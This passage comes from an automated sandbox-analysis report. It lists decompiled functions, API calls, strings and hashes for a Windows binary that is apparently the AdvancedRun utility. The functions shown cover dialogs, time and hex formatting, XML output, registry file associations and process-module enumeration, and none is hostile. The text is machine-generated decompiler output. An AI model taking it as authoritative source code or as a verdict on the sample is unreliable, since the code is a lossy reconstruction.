                                                                                                        • GetSystemMetrics.USER32 ref: 00402C30
                                                                                                        • GetSystemMetrics.USER32 ref: 00402C47
                                                                                                        • GetSystemMetrics.USER32 ref: 00402C4E
                                                                                                        • SetWindowPos.USER32(?,00000000,?,?,?,?,00000204,?,?,?,?,?,?,?,?,0040365B), ref: 00402CA5
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000007.00000002.287776443.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000007.00000002.287771517.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000007.00000002.287785846.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000007.00000002.287793450.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000007.00000002.287799805.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: MetricsSystem$Window
                                                                                                        • String ID:
                                                                                                        • API String ID: 1155976603-0
                                                                                                        • Opcode ID: 03bfd9196a1312a0750f0a2641b8d8190b91a017e6f04a5dd0b934da2af22e19
                                                                                                        • Instruction ID: 7065afd7c6b37d04baa6ac94661e9c3c7a9384fc7fb7d7b8ebf201216021487f
                                                                                                        • Opcode Fuzzy Hash: 03bfd9196a1312a0750f0a2641b8d8190b91a017e6f04a5dd0b934da2af22e19
                                                                                                        • Instruction Fuzzy Hash: B9217F72D00219EBEF14DF68CE496AF7B75EF40318F11446AD901BB1C5D2B8AD81CA98
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 004036D5, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 78COMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 100%
                                                                                                        			E004036D5(void* __edi, void* __eflags) {
				intOrPtr _v8;
				char _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				char* _v24;
				char _v28;
				char* _v48;
				intOrPtr _v56;
				intOrPtr _v60;
				int _v64;
				int _v72;
				intOrPtr _v76;
				wchar_t* _v80;
				intOrPtr _v84;
				int _v92;
				char* _v96;
				intOrPtr _v104;
				struct tagOFNA _v108;
				void _v634;
				long _v636;
				void _v2682;
				char _v2684;
				void* __ebx;
				char _t37;
				intOrPtr _t38;
				int _t46;
				signed short _t54;

				_v636 = 0;
				memset( &_v634, 0, 0x208);
				_v2684 = 0;
				memset( &_v2682, 0, 0x7fe);
				_t37 =  *((intOrPtr*)(L"cfg")); // 0x660063
				_v12 = _t37;
				_t38 =  *0x40cbf0; // 0x67
				_v8 = _t38;
				_v28 = E00405B81(0x227);
				_v24 = L"*.cfg";
				_v20 = E00405B81(0x228);
				_v16 = L"*.*";
				E00405236( &_v2684,  &_v28);
				_t54 = 0xa;
				_v60 = E00405B81(_t54);
				_v104 =  *((intOrPtr*)(__edi + 0x10));
				_v48 =  &_v12;
				_v96 =  &_v2684;
				_v108 = 0x4c;
				_v92 = 0;
				_v84 = 1;
				_v80 =  &_v636;
				_v76 = 0x104;
				_v72 = 0;
				_v64 = 0;
				_v56 = 0x80806;
				_t46 = GetSaveFileNameW( &_v108);
				if(_t46 != 0) {
					wcscpy( &_v636, _v80);
					return E0040365E(__edi, 1,  &_v636);
				}
				return _t46;
			}






























                                                                                                        0x004036ef
                                                                                                        0x004036f6
                                                                                                        0x0040370b
                                                                                                        0x00403712
                                                                                                        0x00403717
                                                                                                        0x0040371c
                                                                                                        0x0040371f
                                                                                                        0x0040372c
                                                                                                        0x00403735
                                                                                                        0x00403738
                                                                                                        0x00403744
                                                                                                        0x00403751
                                                                                                        0x00403758
                                                                                                        0x00403760
                                                                                                        0x00403769
                                                                                                        0x0040376c
                                                                                                        0x00403778
                                                                                                        0x0040377b
                                                                                                        0x0040378b
                                                                                                        0x00403792
                                                                                                        0x00403795
                                                                                                        0x00403798
                                                                                                        0x0040379b
                                                                                                        0x004037a2
                                                                                                        0x004037a5
                                                                                                        0x004037a8
                                                                                                        0x004037af
                                                                                                        0x004037b7
                                                                                                        0x004037c3
                                                                                                        0x00000000
                                                                                                        0x004037d4
                                                                                                        0x004037dc

                                                                                                        APIs
                                                                                                        • memset.MSVCRT ref: 004036F6
                                                                                                        • memset.MSVCRT ref: 00403712
                                                                                                          • Part of subcall function 00405B81: GetModuleHandleW.KERNEL32(00000000,?,?,00403490), ref: 00405BC0
                                                                                                          • Part of subcall function 00405B81: LoadStringW.USER32(00000000,000001F5,?), ref: 00405C59
                                                                                                          • Part of subcall function 00405B81: memcpy.MSVCRT ref: 00405C99
                                                                                                          • Part of subcall function 00405B81: wcscpy.MSVCRT ref: 00405C02
                                                                                                          • Part of subcall function 00405B81: wcslen.MSVCRT ref: 00405C20
                                                                                                          • Part of subcall function 00405B81: GetModuleHandleW.KERNEL32(00000000,?,?,?,00403490), ref: 00405C2E
                                                                                                          • Part of subcall function 00405236: memset.MSVCRT ref: 00405257
                                                                                                          • Part of subcall function 00405236: _snwprintf.MSVCRT ref: 00405285
                                                                                                          • Part of subcall function 00405236: wcslen.MSVCRT ref: 00405291
                                                                                                          • Part of subcall function 00405236: memcpy.MSVCRT ref: 004052A9
                                                                                                          • Part of subcall function 00405236: wcslen.MSVCRT ref: 004052B7
                                                                                                          • Part of subcall function 00405236: memcpy.MSVCRT ref: 004052CA
                                                                                                        • GetSaveFileNameW.COMDLG32(?), ref: 004037AF
                                                                                                        • wcscpy.MSVCRT ref: 004037C3
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000007.00000002.287776443.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000007.00000002.287771517.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000007.00000002.287785846.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000007.00000002.287793450.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000007.00000002.287799805.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: memcpymemsetwcslen$HandleModulewcscpy$FileLoadNameSaveString_snwprintf
                                                                                                        • String ID: L$cfg
                                                                                                        • API String ID: 275899518-3734058911
                                                                                                        • Opcode ID: 82f9c32c0c79633b068e26f34505a517ae9d13a5a1787d7b2c1c5d310a57e8a8
                                                                                                        • Instruction ID: 069f946bae6f7cb0c9846f37a0b0d91fba0b14879ba0d1f27e167351657a8a18
                                                                                                        • Opcode Fuzzy Hash: 82f9c32c0c79633b068e26f34505a517ae9d13a5a1787d7b2c1c5d310a57e8a8
                                                                                                        • Instruction Fuzzy Hash: 78312AB1D04218AFDB50DFA5D889ADEBBB8FF04314F10416AE508B6280DB746A85CF99
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00404ED0, Relevance: 10.6, APIs: 7, Instructions: 63timeCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 100%
                                                                                                        			E00404ED0(FILETIME* __eax, wchar_t* _a4) {
				struct _SYSTEMTIME _v20;
				long _v276;
				long _v532;
				FILETIME* _t15;

				_t15 = __eax;
				if(__eax->dwHighDateTime != 0 ||  *__eax != 0) {
					if(FileTimeToSystemTime(_t15,  &_v20) == 0 || _v20 <= 0x3e8) {
						goto L5;
					} else {
						GetDateFormatW(0x400, 1,  &_v20, 0,  &_v276, 0x80);
						GetTimeFormatW(0x400, 0,  &_v20, 0,  &_v532, 0x80);
						wcscpy(_a4,  &_v276);
						wcscat(_a4, " ");
						wcscat(_a4,  &_v532);
					}
				} else {
					L5:
					wcscpy(_a4, 0x40c4e8);
				}
				return _a4;
			}







                                                                                                        0x00404ed0
                                                                                                        0x00404edf
                                                                                                        0x00404ef6
                                                                                                        0x00000000
                                                                                                        0x00404f00
                                                                                                        0x00404f1c
                                                                                                        0x00404f31
                                                                                                        0x00404f41
                                                                                                        0x00404f4e
                                                                                                        0x00404f5d
                                                                                                        0x00404f66
                                                                                                        0x00404f69
                                                                                                        0x00404f69
                                                                                                        0x00404f71
                                                                                                        0x00404f77
                                                                                                        0x00404f7d

                                                                                                        APIs
                                                                                                        • FileTimeToSystemTime.KERNEL32(?,?), ref: 00404EEE
                                                                                                        • GetDateFormatW.KERNEL32(00000400,00000001,000003E8,00000000,?,00000080,?,?,?,?), ref: 00404F1C
                                                                                                        • GetTimeFormatW.KERNEL32(00000400,00000000,000003E8,00000000,?,00000080,?,?,?,?), ref: 00404F31
                                                                                                        • wcscpy.MSVCRT ref: 00404F41
                                                                                                        • wcscat.MSVCRT ref: 00404F4E
                                                                                                        • wcscat.MSVCRT ref: 00404F5D
                                                                                                        • wcscpy.MSVCRT ref: 00404F71
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000007.00000002.287776443.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000007.00000002.287771517.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000007.00000002.287785846.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000007.00000002.287793450.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000007.00000002.287799805.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: Time$Formatwcscatwcscpy$DateFileSystem
                                                                                                        • String ID:
                                                                                                        • API String ID: 1331804452-0
                                                                                                        • Opcode ID: bcd4d34c10f2eb1284b4297ba1ca8defa1a10ff7f0e8a8f4937edf2a6ab2f069
                                                                                                        • Instruction ID: 27f756489727a3478797c508db698983d473b6c4fef27ef98cb5a9ae0a7a07e8
                                                                                                        • Opcode Fuzzy Hash: bcd4d34c10f2eb1284b4297ba1ca8defa1a10ff7f0e8a8f4937edf2a6ab2f069
                                                                                                        • Instruction Fuzzy Hash: 951160B2840119EBDB11AB94DC85EFE776CFB44304F04457ABA05B6090D774AA858BA8
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00404FE0, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 54COMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 71%
                                                                                                        			E00404FE0(wchar_t* __edi, intOrPtr _a4, signed int _a8) {
				void _v514;
				long _v516;
				wchar_t* _t34;
				signed int _t35;
				void* _t36;
				void* _t37;

				_t34 = __edi;
				_v516 = _v516 & 0x00000000;
				memset( &_v514, 0, 0x1fc);
				 *__edi =  *__edi & 0x00000000;
				_t37 = _t36 + 0xc;
				_t35 = 0;
				do {
					_push( *(_t35 + _a4) & 0x000000ff);
					_push(L"%2.2X");
					_push(0xff);
					_push( &_v516);
					L0040B1EC();
					_t37 = _t37 + 0x10;
					if(_t35 > 0) {
						wcscat(_t34, " ");
					}
					if(_a8 > 0) {
						asm("cdq");
						if(_t35 % _a8 == 0) {
							wcscat(_t34, L"  ");
						}
					}
					wcscat(_t34,  &_v516);
					_t35 = _t35 + 1;
				} while (_t35 < 0x80);
				return _t34;
			}









                                                                                                        0x00404fe0
                                                                                                        0x00404fe9
                                                                                                        0x00405000
                                                                                                        0x00405005
                                                                                                        0x00405009
                                                                                                        0x0040500c
                                                                                                        0x0040500e
                                                                                                        0x00405015
                                                                                                        0x00405016
                                                                                                        0x00405021
                                                                                                        0x00405026
                                                                                                        0x00405027
                                                                                                        0x0040502c
                                                                                                        0x00405031
                                                                                                        0x00405039
                                                                                                        0x0040503f
                                                                                                        0x00405044
                                                                                                        0x00405048
                                                                                                        0x0040504e
                                                                                                        0x00405056
                                                                                                        0x0040505c
                                                                                                        0x0040504e
                                                                                                        0x00405065
                                                                                                        0x0040506a
                                                                                                        0x00405072
                                                                                                        0x00405079

                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000007.00000002.287776443.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000007.00000002.287771517.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000007.00000002.287785846.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000007.00000002.287793450.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000007.00000002.287799805.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: wcscat$_snwprintfmemset
                                                                                                        • String ID: %2.2X
                                                                                                        • API String ID: 2521778956-791839006
                                                                                                        • Opcode ID: 34c89676a934ea4f3d268c8f85442ed9bc59df14bbff203197c18b8f91f69b12
                                                                                                        • Instruction ID: 93e5f8641594d75a0278127c9762c797554eaad4f41234795e116b90c7bd1a0f
                                                                                                        • Opcode Fuzzy Hash: 34c89676a934ea4f3d268c8f85442ed9bc59df14bbff203197c18b8f91f69b12
                                                                                                        • Instruction Fuzzy Hash: FA01B57394072566E72067569C86BBB33ACEB41714F10407BFD14B91C2EB7CDA444ADC
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00407D80, Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 54COMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 42%
                                                                                                        			E00407D80(intOrPtr* __ecx, intOrPtr _a4) {
				void _v514;
				char _v516;
				void _v1026;
				char _v1028;
				void* __esi;
				intOrPtr* _t16;
				void* _t19;
				intOrPtr* _t29;
				char* _t31;

				_t29 = __ecx;
				_v516 = 0;
				memset( &_v514, 0, 0x1fc);
				_v1028 = 0;
				memset( &_v1026, 0, 0x1fc);
				_t16 = _t29;
				if( *((intOrPtr*)(_t29 + 0x24)) == 0) {
					_push(L"<?xml version=\"1.0\" encoding=\"ISO-8859-1\" ?>\r\n");
				} else {
					_push(L"<?xml version=\"1.0\" ?>\r\n");
				}
				E00407343(_t16);
				_t19 =  *((intOrPtr*)( *_t29 + 0x24))(_a4);
				_t31 =  &_v516;
				E00407250(_t31, _t19);
				_push(_t31);
				_push(L"<%s>\r\n");
				_push(0xff);
				_push( &_v1028);
				L0040B1EC();
				return E00407343(_t29, _a4,  &_v1028);
			}












                                                                                                        0x00407d9c
                                                                                                        0x00407d9e
                                                                                                        0x00407da5
                                                                                                        0x00407db3
                                                                                                        0x00407dba
                                                                                                        0x00407dc5
                                                                                                        0x00407dc7
                                                                                                        0x00407dd0
                                                                                                        0x00407dc9
                                                                                                        0x00407dc9
                                                                                                        0x00407dc9
                                                                                                        0x00407dd8
                                                                                                        0x00407de1
                                                                                                        0x00407de5
                                                                                                        0x00407deb
                                                                                                        0x00407df2
                                                                                                        0x00407df3
                                                                                                        0x00407dfe
                                                                                                        0x00407e03
                                                                                                        0x00407e04
                                                                                                        0x00407e21

                                                                                                        APIs
                                                                                                        Strings
                                                                                                        • <?xml version="1.0" ?>, xrefs: 00407DC9
                                                                                                        • <%s>, xrefs: 00407DF3
                                                                                                        • <?xml version="1.0" encoding="ISO-8859-1" ?>, xrefs: 00407DD0
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000007.00000002.287776443.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000007.00000002.287771517.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000007.00000002.287785846.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000007.00000002.287793450.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000007.00000002.287799805.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: memset$_snwprintf
                                                                                                        • String ID: <%s>$<?xml version="1.0" ?>$<?xml version="1.0" encoding="ISO-8859-1" ?>
                                                                                                        • API String ID: 3473751417-2880344631
                                                                                                        • Opcode ID: 9364f374d7518812a9165f05dfc0ba647ea39d808db9dc8e90e0893e61590c4e
                                                                                                        • Instruction ID: f522b8c77a058770ba0888167d6ec5df55c59d6d485a4440fbbc7c77367e2349
                                                                                                        • Opcode Fuzzy Hash: 9364f374d7518812a9165f05dfc0ba647ea39d808db9dc8e90e0893e61590c4e
                                                                                                        • Instruction Fuzzy Hash: E0019BB1E402197AD710A695CC45FBE766CEF44344F0001FBBA08F3191D738AE4586ED
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00403B3C, Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 52COMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 70%
                                                                                                        			E00403B3C(intOrPtr _a4) {
				void _v526;
				char _v528;
				void _v2574;
				char _v2576;
				void* __edi;
				intOrPtr _t29;

				_v2576 = 0;
				memset( &_v2574, 0, 0x7fe);
				_v528 = 0;
				memset( &_v526, 0, 0x208);
				E00404AD9( &_v528);
				_push( &_v528);
				_push(L"\"%s\" /EXEFilename \"%%1\"");
				_push(0x3ff);
				_push( &_v2576);
				L0040B1EC();
				_t37 = _a4 + 0xa68;
				E00404923(0x104, _a4 + 0xa68, L"exefile");
				E00404923(0x104, _a4 + 0xc72, L"Advanced Run");
				E00404923(0x3ff, _t37 + 0x414,  &_v2576);
				_t29 = E0040467A(_t37);
				 *((intOrPtr*)(_a4 + 0x167c)) = _t29;
				return _t29;
			}









                                                                                                        0x00403b56
                                                                                                        0x00403b5d
                                                                                                        0x00403b6f
                                                                                                        0x00403b76
                                                                                                        0x00403b82
                                                                                                        0x00403b8d
                                                                                                        0x00403b8e
                                                                                                        0x00403b99
                                                                                                        0x00403b9e
                                                                                                        0x00403b9f
                                                                                                        0x00403ba7
                                                                                                        0x00403bb9
                                                                                                        0x00403bce
                                                                                                        0x00403be5
                                                                                                        0x00403bef
                                                                                                        0x00403bf8
                                                                                                        0x00403c00

                                                                                                        APIs
                                                                                                        • memset.MSVCRT ref: 00403B5D
                                                                                                        • memset.MSVCRT ref: 00403B76
                                                                                                          • Part of subcall function 00404AD9: GetModuleFileNameW.KERNEL32(00000000,e/@,00000104,00402F65,00000000,?,?,00000000), ref: 00404AE4
                                                                                                        • _snwprintf.MSVCRT ref: 00403B9F
                                                                                                          • Part of subcall function 00404923: wcslen.MSVCRT ref: 0040492A
                                                                                                          • Part of subcall function 00404923: memcpy.MSVCRT ref: 00404940
                                                                                                          • Part of subcall function 0040467A: memset.MSVCRT ref: 004046AF
                                                                                                          • Part of subcall function 0040467A: _snwprintf.MSVCRT ref: 004046CD
                                                                                                          • Part of subcall function 0040467A: RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,?,?,?,?,?,00020019), ref: 004046E6
                                                                                                          • Part of subcall function 0040467A: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,00020019), ref: 004046FA
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000007.00000002.287776443.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000007.00000002.287771517.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000007.00000002.287785846.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000007.00000002.287793450.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000007.00000002.287799805.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: memset$_snwprintf$CloseFileModuleNameOpenmemcpywcslen
                                                                                                        • String ID: "%s" /EXEFilename "%%1"$Advanced Run$exefile
                                                                                                        • API String ID: 1832587304-479876776
                                                                                                        • Opcode ID: 0a24b3981c90f53bc0afe707e01056d79404e7683c9323ccd1d0569bed7942f0
                                                                                                        • Instruction ID: c5548abdd2f98fe5b378efca96f69d72dd5acd8230f4ce7b006819db5738462c
                                                                                                        • Opcode Fuzzy Hash: 0a24b3981c90f53bc0afe707e01056d79404e7683c9323ccd1d0569bed7942f0
                                                                                                        • Instruction Fuzzy Hash: 6B11A3B29403186AD720E761CC05ACF776CDF45314F0041B6BA08B71C2D77C5B418B9E
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 0040AFBE, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 45COMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 100%
                                                                                                        			E0040AFBE(void* __esi, void* _a4, wchar_t* _a8, wchar_t* _a12) {
				void* _v8;
				int _v12;
				short _v524;
				char _v1036;
				void* __edi;

				wcscpy( &_v524, L"\\StringFileInfo\\");
				wcscat( &_v524, _a8);
				wcscat( &_v524, "\\");
				wcscat( &_v524, _a12);
				if(VerQueryValueW(_a4,  &_v524,  &_v8,  &_v12) == 0) {
					return 0;
				}
				_t34 =  &_v1036;
				E00404923(0xff,  &_v1036, _v8);
				E004049A2(_t34, __esi);
				return 1;
			}








                                                                                                        0x0040afd3
                                                                                                        0x0040afe2
                                                                                                        0x0040aff3
                                                                                                        0x0040b002
                                                                                                        0x0040b023
                                                                                                        0x00000000
                                                                                                        0x0040b047
                                                                                                        0x0040b02e
                                                                                                        0x0040b034
                                                                                                        0x0040b03c
                                                                                                        0x00000000

                                                                                                        APIs
                                                                                                        • wcscpy.MSVCRT ref: 0040AFD3
                                                                                                        • wcscat.MSVCRT ref: 0040AFE2
                                                                                                        • wcscat.MSVCRT ref: 0040AFF3
                                                                                                        • wcscat.MSVCRT ref: 0040B002
                                                                                                        • VerQueryValueW.VERSION(?,?,00000000,?), ref: 0040B01C
                                                                                                          • Part of subcall function 00404923: wcslen.MSVCRT ref: 0040492A
                                                                                                          • Part of subcall function 00404923: memcpy.MSVCRT ref: 00404940
                                                                                                          • Part of subcall function 004049A2: lstrcpyW.KERNEL32 ref: 004049B7
                                                                                                          • Part of subcall function 004049A2: lstrlenW.KERNEL32(?), ref: 004049BE
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000007.00000002.287776443.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000007.00000002.287771517.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000007.00000002.287785846.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000007.00000002.287793450.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000007.00000002.287799805.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: wcscat$QueryValuelstrcpylstrlenmemcpywcscpywcslen
                                                                                                        • String ID: \StringFileInfo\
                                                                                                        • API String ID: 393120378-2245444037
                                                                                                        • Opcode ID: 045a8df20043a551ca88a82222e75e8b313ea16cabd954164b3126fb0df90005
                                                                                                        • Instruction ID: 46c7c43bb965d9609608e4f6c2ae6b517043b349f439a100f6d085a340de75fe
                                                                                                        • Opcode Fuzzy Hash: 045a8df20043a551ca88a82222e75e8b313ea16cabd954164b3126fb0df90005
                                                                                                        • Instruction Fuzzy Hash: CF015EB290020DA6DB11EAA2CC45DDF776DDB44304F0005B6B654F2092EB3CDA969A98
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00405E8D, Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 26COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000007.00000002.287776443.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000007.00000002.287771517.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000007.00000002.287785846.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000007.00000002.287793450.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000007.00000002.287799805.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: _snwprintfwcscpy
                                                                                                        • String ID: dialog_%d$general$menu_%d$strings
                                                                                                        • API String ID: 999028693-502967061
                                                                                                        • Opcode ID: b64df2e80323ba4b17253e10f943d6139d2bc5d6bf6da17a7692c82038848a44
                                                                                                        • Instruction ID: fc2f6d5a95cb840c7437c23e5da9cc5f651b22c54dcbfaa02992beb3cb27aad2
                                                                                                        • Opcode Fuzzy Hash: b64df2e80323ba4b17253e10f943d6139d2bc5d6bf6da17a7692c82038848a44
                                                                                                        • Instruction Fuzzy Hash: CDE08C31A94B00B5E96423418DC7F2B2801DE90B14FB0083BF686B05C1E6BDBA0528DF
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 004092F0, Relevance: 9.1, APIs: 6, Instructions: 141COMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 38%
                                                                                                        			E004092F0(void* __ecx, void* __eflags, long _a4, void _a8, intOrPtr _a12, long _a16, intOrPtr _a508, intOrPtr _a512, intOrPtr _a540, intOrPtr _a544, char _a552, char _a560, intOrPtr _a572, intOrPtr _a576, intOrPtr _a580, long _a1096, char _a1600, int _a1616, void _a1618, char _a2160) {
				void* _v0;
				intOrPtr _v4;
				intOrPtr _v8;
				unsigned int _v12;
				void* _v16;
				char _v20;
				char _v24;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v44;
				void* __edi;
				void* __esi;
				intOrPtr _t58;
				void* _t59;
				void* _t69;
				void* _t72;
				intOrPtr _t78;
				void _t89;
				signed int _t90;
				int _t98;
				signed int _t105;
				signed int _t106;
				void* _t109;

				_t106 = _t105 & 0xfffffff8;
				E0040B550(0x8874, __ecx);
				_t98 = 0;
				_a8 = 0;
				if(E00404BD3() == 0) {
					L12:
					__eflags =  *0x4101b8 - _t98; // 0x0
					if(__eflags != 0) {
						_t89 = _a4;
						_t58 =  *0x40f83c(8, _t89);
						__eflags = _t58 - 0xffffffff;
						_v8 = _t58;
						if(_t58 != 0xffffffff) {
							_v0 = 1;
							_a560 = 0x428;
							_t59 =  *0x40f834(_t58,  &_a560);
							while(1) {
								__eflags = _t59;
								if(_t59 == 0) {
									goto L18;
								}
								memset( &_a8, _t98, 0x21c);
								_a12 = _a580;
								_a8 = _t89;
								wcscpy( &_a16,  &_a1096);
								_a540 = _a576;
								_t106 = _t106 + 0x14;
								_a544 = _a572;
								_a552 = 0x428;
								_t69 = E00409510(_a8,  &_a8);
								__eflags = _t69;
								if(_t69 != 0) {
									_t59 =  *0x40f830(_v16,  &_a552);
									continue;
								}
								goto L18;
							}
							goto L18;
						}
					}
				} else {
					_t109 =  *0x4101bc - _t98; // 0x0
					if(_t109 == 0) {
						goto L12;
					} else {
						_t72 = OpenProcess(0x410, 0, _a4);
						_v0 = _t72;
						if(_t72 != 0) {
							_push( &_a4);
							_push(0x8000);
							_push( &_a2160);
							_push(_t72);
							if( *0x40f840() != 0) {
								_t6 =  &_v12;
								 *_t6 = _v12 >> 2;
								_v8 = 1;
								_t90 = 0;
								if( *_t6 != 0) {
									while(1) {
										_a1616 = _t98;
										memset( &_a1618, _t98, 0x208);
										memset( &_a8, _t98, 0x21c);
										_t78 =  *((intOrPtr*)(_t106 + 0x898 + _t90 * 4));
										_t106 = _t106 + 0x18;
										_a8 = _a4;
										_a12 = _t78;
										 *0x40f838(_v16, _t78,  &_a1616, 0x104);
										E0040920A( &_v0,  &_a1600);
										_push(0xc);
										_push( &_v20);
										_push(_v4);
										_push(_v32);
										if( *0x40f844() != 0) {
											_a508 = _v32;
											_a512 = _v36;
										}
										if(E00409510(_a8,  &_v24) == 0) {
											goto L18;
										}
										_t90 = _t90 + 1;
										if(_t90 < _v44) {
											_t98 = 0;
											__eflags = 0;
											continue;
										} else {
										}
										goto L18;
									}
								}
							}
							L18:
							CloseHandle(_v16);
						}
					}
				}
				return _a8;
			}


























                                                                                                        0x004092f3
                                                                                                        0x004092fb
                                                                                                        0x00409303
                                                                                                        0x00409305
                                                                                                        0x00409310
                                                                                                        0x00409433
                                                                                                        0x00409433
                                                                                                        0x00409439
                                                                                                        0x0040943f
                                                                                                        0x00409445
                                                                                                        0x0040944b
                                                                                                        0x0040944e
                                                                                                        0x00409452
                                                                                                        0x00409466
                                                                                                        0x0040946e
                                                                                                        0x00409475
                                                                                                        0x004094f7
                                                                                                        0x004094f7
                                                                                                        0x004094f9
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00409488
                                                                                                        0x00409494
                                                                                                        0x004094a5
                                                                                                        0x004094a9
                                                                                                        0x004094b5
                                                                                                        0x004094c3
                                                                                                        0x004094c6
                                                                                                        0x004094d5
                                                                                                        0x004094dc
                                                                                                        0x004094e1
                                                                                                        0x004094e3
                                                                                                        0x004094f1
                                                                                                        0x00000000
                                                                                                        0x004094f1
                                                                                                        0x00000000
                                                                                                        0x004094e3
                                                                                                        0x00000000
                                                                                                        0x004094f7
                                                                                                        0x00409452
                                                                                                        0x00409316
                                                                                                        0x00409316
                                                                                                        0x0040931c
                                                                                                        0x00000000
                                                                                                        0x00409322
                                                                                                        0x0040932b
                                                                                                        0x00409333
                                                                                                        0x00409337
                                                                                                        0x00409341
                                                                                                        0x00409342
                                                                                                        0x0040934e
                                                                                                        0x0040934f
                                                                                                        0x00409358
                                                                                                        0x0040935e
                                                                                                        0x0040935e
                                                                                                        0x00409363
                                                                                                        0x0040936b
                                                                                                        0x0040936d
                                                                                                        0x00409377
                                                                                                        0x00409385
                                                                                                        0x0040938d
                                                                                                        0x0040939d
                                                                                                        0x004093a5
                                                                                                        0x004093ac
                                                                                                        0x004093b4
                                                                                                        0x004093c5
                                                                                                        0x004093c9
                                                                                                        0x004093da
                                                                                                        0x004093df
                                                                                                        0x004093e5
                                                                                                        0x004093e6
                                                                                                        0x004093ea
                                                                                                        0x004093f6
                                                                                                        0x004093fc
                                                                                                        0x00409407
